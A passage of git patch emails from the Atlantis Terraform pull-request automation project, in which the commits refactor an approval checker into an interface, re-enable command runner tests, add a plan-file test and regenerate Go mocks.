unreachable if access is blocked -by a firewall. - -If automatic installation is not possible or desirable in your environment, -you may alternatively manually install plugins by downloading a suitable -distribution package and placing the plugin's executable file in the -following directory: - terraform.d/plugins/darwin_amd64 - - -``` - ---- -### 2. workspace: `default` path: `.` -```diff -Refreshing Terraform state in-memory prior to plan... -The refreshed state will be used to calculate this plan, but will not be -persisted to local or remote state storage. - - ------------------------------------------------------------------------- - -An execution plan has been generated and is shown below. -Resource actions are indicated with the following symbols: - + create - -Terraform will perform the following actions: - -+ null_resource.simple - id: -Plan: 1 to add, 0 to change, 0 to destroy. - -``` - -* To **discard** this plan click [here](lock-url). ---- - From 124a016f089451023402c0be0a03e4ef8ee77da1 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Thu, 21 Jun 2018 18:27:03 +0100 Subject: [PATCH 41/69] WIP --- server/events/project_command_runner.go | 2 +- .../events/runtime/apply_step_runner_test.go | 27 +++++++++++++++++++ .../events/runtime/pull_approved_checker.go | 13 ++------- server/events_controller_e2e_test.go | 6 ++--- server/server.go | 6 ++--- 5 files changed, 34 insertions(+), 20 deletions(-) diff --git a/server/events/project_command_runner.go b/server/events/project_command_runner.go index 0db221defe..45117c3a06 100644 --- a/server/events/project_command_runner.go +++ b/server/events/project_command_runner.go @@ -153,7 +153,7 @@ func (p *ProjectCommandRunner) Apply(ctx models.ProjectCommandContext) ProjectCo for _, req := range ctx.ProjectConfig.ApplyRequirements { switch req { case "approved": - approved, err := p.PullApprovedChecker.IsApproved(ctx.BaseRepo, ctx.Pull) + approved, err := p.PullApprovedChecker.PullIsApproved(ctx.BaseRepo, ctx.Pull) if err != nil { return ProjectCommandResult{Error: errors.Wrap(err, "checking if pull request was approved")} } diff --git a/server/events/runtime/apply_step_runner_test.go b/server/events/runtime/apply_step_runner_test.go index afc5c99e30..4ebdc39c05 100644 --- a/server/events/runtime/apply_step_runner_test.go +++ b/server/events/runtime/apply_step_runner_test.go @@ -65,6 +65,33 @@ func TestRun_Success(t *testing.T) { terraform.VerifyWasCalledOnce().RunCommandWithVersion(nil, tmpDir, []string{"apply", "-no-color", "extra", "args", "comment", "args", planPath}, nil, "workspace") } +func TestRun_AppliesCorrectProjectPlan(t *testing.T) { + // When running for a project, the planfile has a different name. + tmpDir, cleanup := TempDir(t) + defer cleanup() + planPath := filepath.Join(tmpDir, "projectname-default.tfplan") + err := ioutil.WriteFile(planPath, nil, 0644) + Ok(t, err) + + RegisterMockTestingT(t) + terraform := mocks.NewMockClient() + o := runtime.ApplyStepRunner{ + TerraformExecutor: terraform, + } + + When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). + ThenReturn("output", nil) + output, err := o.Run(models.ProjectCommandContext{ + Workspace: "default", + RepoRelPath: ".", + ProjectName: "projectname", + CommentArgs: []string{"comment", "args"}, + }, []string{"extra", "args"}, tmpDir) + Ok(t, err) + Equals(t, "output", output) + terraform.VerifyWasCalledOnce().RunCommandWithVersion(nil, tmpDir, []string{"apply", "-no-color", "extra", "args", "comment", "args", planPath}, nil, "default") +} + func TestRun_UsesConfiguredTFVersion(t *testing.T) { tmpDir, cleanup := TempDir(t) defer cleanup() diff --git a/server/events/runtime/pull_approved_checker.go b/server/events/runtime/pull_approved_checker.go index 049f434969..86945fce33 100644 --- a/server/events/runtime/pull_approved_checker.go +++ b/server/events/runtime/pull_approved_checker.go @@ -2,17 +2,8 @@ package runtime import ( "github.com/runatlantis/atlantis/server/events/models" - "github.com/runatlantis/atlantis/server/events/vcs" ) -type PullApprovedChecker struct { - VCSClient vcs.ClientProxy -} - -func (a *PullApprovedChecker) IsApproved(baseRepo models.Repo, pull models.PullRequest) (bool, error) { - approved, err := a.VCSClient.PullIsApproved(baseRepo, pull) - if err != nil { - return false, err - } - return approved, nil +type PullApprovedChecker interface { + PullIsApproved(baseRepo models.Repo, pull models.PullRequest) (bool, error) } diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go index 5abb66ad37..85870df845 100644 --- a/server/events_controller_e2e_test.go +++ b/server/events_controller_e2e_test.go @@ -252,10 +252,8 @@ func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy, ApplyStepRunner: runtime.ApplyStepRunner{ TerraformExecutor: terraformClient, }, - RunStepRunner: runtime.RunStepRunner{}, - PullApprovedChecker: runtime.PullApprovedChecker{ - VCSClient: e2eVCSClient, - }, + RunStepRunner: runtime.RunStepRunner{}, + PullApprovedChecker: e2eVCSClient, Workspace: atlantisWorkspace, Webhooks: &mockWebhookSender{}, AtlantisWorkspaceLocker: locker, diff --git a/server/server.go b/server/server.go index 1980ba2521..d02c1c9221 100644 --- a/server/server.go +++ b/server/server.go @@ -251,10 +251,8 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { ApplyStepRunner: runtime.ApplyStepRunner{ TerraformExecutor: terraformClient, }, - RunStepRunner: runtime.RunStepRunner{}, - PullApprovedChecker: runtime.PullApprovedChecker{ - VCSClient: vcsClient, - }, + RunStepRunner: runtime.RunStepRunner{}, + PullApprovedChecker: vcsClient, Workspace: workspace, Webhooks: webhooksManager, AtlantisWorkspaceLocker: workspaceLocker, From 17a9c7f535d91dc49193ede612beaa2e8cf6a9f4 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Thu, 21 Jun 2018 18:50:19 +0100 Subject: [PATCH 42/69] Regen mocks --- Makefile | 11 +- server/events/command_runner_test.go | 359 +++++++++--------- server/events/executor.go | 22 -- .../matchers/events_commandparseresult.go | 20 - ...nd.go => ptr_to_events_trylockresponse.go} | 10 +- .../mocks/mock_atlantis_workspace_locker.go | 51 +++ server/events/mocks/mock_executor.go | 76 ---- server/events/mocks/mock_project_lock.go | 98 +++++ server/events/vcs/mocks/mock_client.go | 20 +- server/logging/simple_logger.go | 2 + 10 files changed, 355 insertions(+), 314 deletions(-) delete mode 100644 server/events/executor.go delete mode 100644 server/events/mocks/matchers/events_commandparseresult.go rename server/events/mocks/matchers/{ptr_to_events_command.go => ptr_to_events_trylockresponse.go} (51%) delete mode 100644 server/events/mocks/mock_executor.go create mode 100644 server/events/mocks/mock_project_lock.go diff --git a/Makefile b/Makefile index 5f10ddf0eb..c2510ac725 100644 --- a/Makefile +++ b/Makefile @@ -28,11 +28,12 @@ build-service: ## Build the main Go service go-generate: ## Run go generate in all packages go generate $(PKG) -regen-mocks: ## Delete all mocks and then run go generate to regen them - find . -type f | grep mocks/mock | grep -v vendor | xargs rm - @# not using $(PKG) here because that it includes directories that have now - @# been deleted, causing go generate to fail. - go generate $$(go list ./... | grep -v e2e | grep -v vendor | grep -v static) +#regen-mocks: ## Delete all mocks and matchers and then run go generate to regen them. This doesn't work anymore. +#find . -type f | grep mocks/mock_ | grep -v vendor | xargs rm +#find . -type f | grep mocks/matchers | grep -v vendor | xargs rm +#@# not using $(PKG) here because that it includes directories that have now +#@# been deleted, causing go generate to fail. +#echo "this doesn't work anymore: go generate \$\$(go list ./... | grep -v e2e | grep -v vendor | grep -v static)" test: ## Run tests @go test -short $(PKG) diff --git a/server/events/command_runner_test.go b/server/events/command_runner_test.go index a0d636c9a8..456ce6d293 100644 --- a/server/events/command_runner_test.go +++ b/server/events/command_runner_test.go @@ -15,15 +15,22 @@ package events_test import ( "bytes" + "errors" "log" + "strings" "testing" + "github.com/google/go-github/github" . "github.com/petergtz/pegomock" "github.com/runatlantis/atlantis/server/events" "github.com/runatlantis/atlantis/server/events/mocks" + "github.com/runatlantis/atlantis/server/events/mocks/matchers" + "github.com/runatlantis/atlantis/server/events/models" + "github.com/runatlantis/atlantis/server/events/models/fixtures" + "github.com/runatlantis/atlantis/server/events/vcs" vcsmocks "github.com/runatlantis/atlantis/server/events/vcs/mocks" logmocks "github.com/runatlantis/atlantis/server/logging/mocks" - //. "github.com/runatlantis/atlantis/testing" + . "github.com/runatlantis/atlantis/testing" ) var projectCommandBuilder *mocks.MockProjectCommandBuilder @@ -62,178 +69,178 @@ func setup(t *testing.T) { } } -//func TestExecuteCommand_LogPanics(t *testing.T) { -// t.Log("if there is a panic it is commented back on the pull request") -// setup(t) -// ch.AllowForkPRs = true // Lets us get to the panic code. -// defer func() { ch.AllowForkPRs = false }() -// When(ghStatus.Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, events.Plan)).ThenPanic("panic") -// ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, 1, nil) -// _, _, comment := vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()).GetCapturedArguments() -// Assert(t, strings.Contains(comment, "Error: goroutine panic"), "comment should be about a goroutine panic") -//} -// -//func TestExecuteCommand_NoGithubPullGetter(t *testing.T) { -// t.Log("if DefaultCommandRunner was constructed with a nil GithubPullGetter an error should be logged") -// setup(t) -// ch.GithubPullGetter = nil -// ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, 1, nil) -// Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitHub\n", logBytes.String()) -//} -// -//func TestExecuteCommand_NoGitlabMergeGetter(t *testing.T) { -// t.Log("if DefaultCommandRunner was constructed with a nil GitlabMergeRequestGetter an error should be logged") -// setup(t) -// ch.GitlabMergeRequestGetter = nil -// ch.RunCommentCommand(fixtures.GitlabRepo, &fixtures.GitlabRepo, fixtures.User, 1, nil) -// Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitLab\n", logBytes.String()) -//} -// -//func TestExecuteCommand_GithubPullErr(t *testing.T) { -// t.Log("if getting the github pull request fails an error should be logged") -// setup(t) -// When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err")) -// ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil) -// Equals(t, "[ERROR] runatlantis/atlantis#1: Making pull request API call to GitHub: err\n", logBytes.String()) -//} -// -//func TestExecuteCommand_GitlabMergeRequestErr(t *testing.T) { -// t.Log("if getting the gitlab merge request fails an error should be logged") -// setup(t) -// When(gitlabGetter.GetMergeRequest(fixtures.GithubRepo.FullName, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err")) -// ch.RunCommentCommand(fixtures.GitlabRepo, &fixtures.GitlabRepo, fixtures.User, fixtures.Pull.Num, nil) -// Equals(t, "[ERROR] runatlantis/atlantis#1: Making merge request API call to GitLab: err\n", logBytes.String()) -//} -// -//func TestExecuteCommand_GithubPullParseErr(t *testing.T) { -// t.Log("if parsing the returned github pull request fails an error should be logged") -// setup(t) -// var pull github.PullRequest -// When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil) -// When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, errors.New("err")) -// -// ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil) -// Equals(t, "[ERROR] runatlantis/atlantis#1: Extracting required fields from comment data: err\n", logBytes.String()) -//} -// -//func TestExecuteCommand_ForkPRDisabled(t *testing.T) { -// t.Log("if a command is run on a forked pull request and this is disabled atlantis should" + -// " comment saying that this is not allowed") -// setup(t) -// ch.AllowForkPRs = false // by default it's false so don't need to reset -// var pull github.PullRequest -// modelPull := models.PullRequest{State: models.Open} -// When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil) -// -// headRepo := fixtures.GithubRepo -// headRepo.FullName = "forkrepo/atlantis" -// headRepo.Owner = "forkrepo" -// When(eventParsing.ParseGithubPull(&pull)).ThenReturn(modelPull, headRepo, nil) -// -// ch.RunCommentCommand(fixtures.GithubRepo, nil, fixtures.User, fixtures.Pull.Num, nil) -// vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on fork pull requests. To enable, set --"+ch.AllowForkPRsFlag) -//} -// -//func TestExecuteCommand_ClosedPull(t *testing.T) { -// t.Log("if a command is run on a closed pull request atlantis should" + -// " comment saying that this is not allowed") -// setup(t) -// pull := &github.PullRequest{ -// State: github.String("closed"), -// } -// modelPull := models.PullRequest{State: models.Closed} -// When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil) -// When(eventParsing.ParseGithubPull(pull)).ThenReturn(modelPull, fixtures.GithubRepo, nil) -// -// ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil) -// vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on closed pull requests") -//} -// -//func TestExecuteCommand_WorkspaceLocked(t *testing.T) { -// t.Log("if the workspace is locked, should comment back on the pull") -// setup(t) -// pull := &github.PullRequest{ -// State: github.String("closed"), -// } -// cmd := events.CommentCommand{ -// Name: events.Plan, -// Workspace: "workspace", -// } -// -// When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil) -// When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil) -// When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(false) -// ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd) -// -// msg := "The workspace workspace is currently locked by another" + -// " command that is running for this pull request." + -// " Wait until the previous command is complete and try again." -// ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, cmd.CommandName()) -// _, _, result := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandName(), matchers.AnyEventsCommandResult()).GetCapturedArguments() -// Equals(t, msg, result.Failure) -// vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, fixtures.Pull.Num, -// "**Plan Failed**: "+msg+"\n\n") -//} -// -//func TestExecuteCommand_FullRun(t *testing.T) { -// t.Log("when running a plan, apply should comment") -// pull := &github.PullRequest{ -// State: github.String("closed"), -// } -// cmdResult := events.CommandResult{} -// for _, c := range []events.CommandName{events.Plan, events.Apply} { -// setup(t) -// cmd := events.CommentCommand{ -// Name: c, -// Workspace: "workspace", -// } -// When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil) -// When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil) -// When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true) -// switch c { -// case events.Plan: -// When(projectCommandBuilder.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResult) -// case events.Apply: -// When(projectCommandBuilder.ApplyViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResult) -// } -// -// ch.RunCommentCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd) -// -// ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd) -// _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResult()).GetCapturedArguments() -// Equals(t, cmdResult, response) -// vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()) -// workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num) -// } -//} -// -//func TestExecuteCommand_ForkPREnabled(t *testing.T) { -// t.Log("when running a plan on a fork PR, it should succeed") -// setup(t) -// -// // Enable forked PRs. -// ch.AllowForkPRs = true -// defer func() { ch.AllowForkPRs = false }() // Reset after test. -// -// var pull github.PullRequest -// cmdResponse := events.CommandResult{} -// cmd := events.CommentCommand{ -// Name: events.Plan, -// Workspace: "workspace", -// } -// When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil) -// headRepo := fixtures.GithubRepo -// headRepo.FullName = "forkrepo/atlantis" -// headRepo.Owner = "forkrepo" -// When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, headRepo, nil) -// When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true) -// When(projectCommandBuilder.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse) -// -// ch.RunCommentCommand(fixtures.GithubRepo, models.Repo{} /* this isn't used */, fixtures.User, fixtures.Pull.Num, &cmd) -// -// ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd) -// _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResult()).GetCapturedArguments() -// Equals(t, cmdResponse, response) -// vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()) -// workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num) -//} +func TestExecuteCommand_LogPanics(t *testing.T) { + t.Log("if there is a panic it is commented back on the pull request") + setup(t) + ch.AllowForkPRs = true // Lets us get to the panic code. + defer func() { ch.AllowForkPRs = false }() + When(ghStatus.Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, events.Plan)).ThenPanic("panic") + ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, 1, nil) + _, _, comment := vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()).GetCapturedArguments() + Assert(t, strings.Contains(comment, "Error: goroutine panic"), "comment should be about a goroutine panic") +} + +func TestExecuteCommand_NoGithubPullGetter(t *testing.T) { + t.Log("if DefaultCommandRunner was constructed with a nil GithubPullGetter an error should be logged") + setup(t) + ch.GithubPullGetter = nil + ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, 1, nil) + Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitHub\n", logBytes.String()) +} + +func TestExecuteCommand_NoGitlabMergeGetter(t *testing.T) { + t.Log("if DefaultCommandRunner was constructed with a nil GitlabMergeRequestGetter an error should be logged") + setup(t) + ch.GitlabMergeRequestGetter = nil + ch.RunCommentCommand(fixtures.GitlabRepo, &fixtures.GitlabRepo, fixtures.User, 1, nil) + Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitLab\n", logBytes.String()) +} + +func TestExecuteCommand_GithubPullErr(t *testing.T) { + t.Log("if getting the github pull request fails an error should be logged") + setup(t) + When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err")) + ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil) + Equals(t, "[ERROR] runatlantis/atlantis#1: Making pull request API call to GitHub: err\n", logBytes.String()) +} + +func TestExecuteCommand_GitlabMergeRequestErr(t *testing.T) { + t.Log("if getting the gitlab merge request fails an error should be logged") + setup(t) + When(gitlabGetter.GetMergeRequest(fixtures.GithubRepo.FullName, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err")) + ch.RunCommentCommand(fixtures.GitlabRepo, &fixtures.GitlabRepo, fixtures.User, fixtures.Pull.Num, nil) + Equals(t, "[ERROR] runatlantis/atlantis#1: Making merge request API call to GitLab: err\n", logBytes.String()) +} + +func TestExecuteCommand_GithubPullParseErr(t *testing.T) { + t.Log("if parsing the returned github pull request fails an error should be logged") + setup(t) + var pull github.PullRequest + When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil) + When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, errors.New("err")) + + ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil) + Equals(t, "[ERROR] runatlantis/atlantis#1: Extracting required fields from comment data: err\n", logBytes.String()) +} + +func TestExecuteCommand_ForkPRDisabled(t *testing.T) { + t.Log("if a command is run on a forked pull request and this is disabled atlantis should" + + " comment saying that this is not allowed") + setup(t) + ch.AllowForkPRs = false // by default it's false so don't need to reset + var pull github.PullRequest + modelPull := models.PullRequest{State: models.Open} + When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil) + + headRepo := fixtures.GithubRepo + headRepo.FullName = "forkrepo/atlantis" + headRepo.Owner = "forkrepo" + When(eventParsing.ParseGithubPull(&pull)).ThenReturn(modelPull, headRepo, nil) + + ch.RunCommentCommand(fixtures.GithubRepo, nil, fixtures.User, fixtures.Pull.Num, nil) + vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on fork pull requests. To enable, set --"+ch.AllowForkPRsFlag) +} + +func TestExecuteCommand_ClosedPull(t *testing.T) { + t.Log("if a command is run on a closed pull request atlantis should" + + " comment saying that this is not allowed") + setup(t) + pull := &github.PullRequest{ + State: github.String("closed"), + } + modelPull := models.PullRequest{State: models.Closed} + When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil) + When(eventParsing.ParseGithubPull(pull)).ThenReturn(modelPull, fixtures.GithubRepo, nil) + + ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil) + vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on closed pull requests") +} + +func TestExecuteCommand_WorkspaceLocked(t *testing.T) { + t.Log("if the workspace is locked, should comment back on the pull") + setup(t) + pull := &github.PullRequest{ + State: github.String("closed"), + } + cmd := events.CommentCommand{ + Name: events.Plan, + Workspace: "workspace", + } + + When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil) + When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil) + When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(false) + ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd) + + msg := "The workspace workspace is currently locked by another" + + " command that is running for this pull request." + + " Wait until the previous command is complete and try again." + ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, cmd.CommandName()) + _, _, result := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandName(), matchers.AnyEventsCommandResult()).GetCapturedArguments() + Equals(t, msg, result.Failure) + vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, fixtures.Pull.Num, + "**Plan Failed**: "+msg+"\n\n") +} + +func TestExecuteCommand_FullRun(t *testing.T) { + t.Log("when running a plan, apply should comment") + pull := &github.PullRequest{ + State: github.String("closed"), + } + cmdResult := events.CommandResult{} + for _, c := range []events.CommandName{events.Plan, events.Apply} { + setup(t) + cmd := events.CommentCommand{ + Name: c, + Workspace: "workspace", + } + When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil) + When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil) + When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true) + switch c { + case events.Plan: + When(projectCommandBuilder.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResult) + case events.Apply: + When(projectCommandBuilder.ApplyViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResult) + } + + ch.RunCommentCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd) + + ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd) + _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResult()).GetCapturedArguments() + Equals(t, cmdResult, response) + vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()) + workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num) + } +} + +func TestExecuteCommand_ForkPREnabled(t *testing.T) { + t.Log("when running a plan on a fork PR, it should succeed") + setup(t) + + // Enable forked PRs. + ch.AllowForkPRs = true + defer func() { ch.AllowForkPRs = false }() // Reset after test. + + var pull github.PullRequest + cmdResponse := events.CommandResult{} + cmd := events.CommentCommand{ + Name: events.Plan, + Workspace: "workspace", + } + When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil) + headRepo := fixtures.GithubRepo + headRepo.FullName = "forkrepo/atlantis" + headRepo.Owner = "forkrepo" + When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, headRepo, nil) + When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true) + When(projectCommandBuilder.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse) + + ch.RunCommentCommand(fixtures.GithubRepo, models.Repo{} /* this isn't used */, fixtures.User, fixtures.Pull.Num, &cmd) + + ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd) + _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResult()).GetCapturedArguments() + Equals(t, cmdResponse, response) + vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()) + workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num) +} diff --git a/server/events/executor.go b/server/events/executor.go deleted file mode 100644 index b308e9d02c..0000000000 --- a/server/events/executor.go +++ /dev/null @@ -1,22 +0,0 @@ -// Copyright 2017 HootSuite Media Inc. -// -// Licensed under the Apache License, Version 2.0 (the License); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// http://www.apache.org/licenses/LICENSE-2.0 -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an AS IS BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// Modified hereafter by contributors to runatlantis/atlantis. -// -package events - -//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_executor.go Executor - -// Executor is the generic interface implemented by each command type: -// help, plan, and apply. -type Executor interface { - Execute(ctx *CommandContext) CommandResult -} diff --git a/server/events/mocks/matchers/events_commandparseresult.go b/server/events/mocks/matchers/events_commandparseresult.go deleted file mode 100644 index 12e5991a7e..0000000000 --- a/server/events/mocks/matchers/events_commandparseresult.go +++ /dev/null @@ -1,20 +0,0 @@ -package matchers - -import ( - "reflect" - - "github.com/petergtz/pegomock" - events "github.com/runatlantis/atlantis/server/events" -) - -func AnyEventsCommandParseResult() events.CommentParseResult { - pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(events.CommentParseResult))(nil)).Elem())) - var nullValue events.CommentParseResult - return nullValue -} - -func EqEventsCommandParseResult(value events.CommentParseResult) events.CommentParseResult { - pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value}) - var nullValue events.CommentParseResult - return nullValue -} diff --git a/server/events/mocks/matchers/ptr_to_events_command.go b/server/events/mocks/matchers/ptr_to_events_trylockresponse.go similarity index 51% rename from server/events/mocks/matchers/ptr_to_events_command.go rename to server/events/mocks/matchers/ptr_to_events_trylockresponse.go index 771aacf306..14d747bb4a 100644 --- a/server/events/mocks/matchers/ptr_to_events_command.go +++ b/server/events/mocks/matchers/ptr_to_events_trylockresponse.go @@ -7,14 +7,14 @@ import ( events "github.com/runatlantis/atlantis/server/events" ) -func AnyPtrToEventsCommand() *events.CommentCommand { - pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*events.CommentCommand))(nil)).Elem())) - var nullValue *events.CommentCommand +func AnyPtrToEventsTryLockResponse() *events.TryLockResponse { + pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*events.TryLockResponse))(nil)).Elem())) + var nullValue *events.TryLockResponse return nullValue } -func EqPtrToEventsCommand(value *events.CommentCommand) *events.CommentCommand { +func EqPtrToEventsTryLockResponse(value *events.TryLockResponse) *events.TryLockResponse { pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value}) - var nullValue *events.CommentCommand + var nullValue *events.TryLockResponse return nullValue } diff --git a/server/events/mocks/mock_atlantis_workspace_locker.go b/server/events/mocks/mock_atlantis_workspace_locker.go index 3f190f396e..cd4236ced8 100644 --- a/server/events/mocks/mock_atlantis_workspace_locker.go +++ b/server/events/mocks/mock_atlantis_workspace_locker.go @@ -29,6 +29,22 @@ func (mock 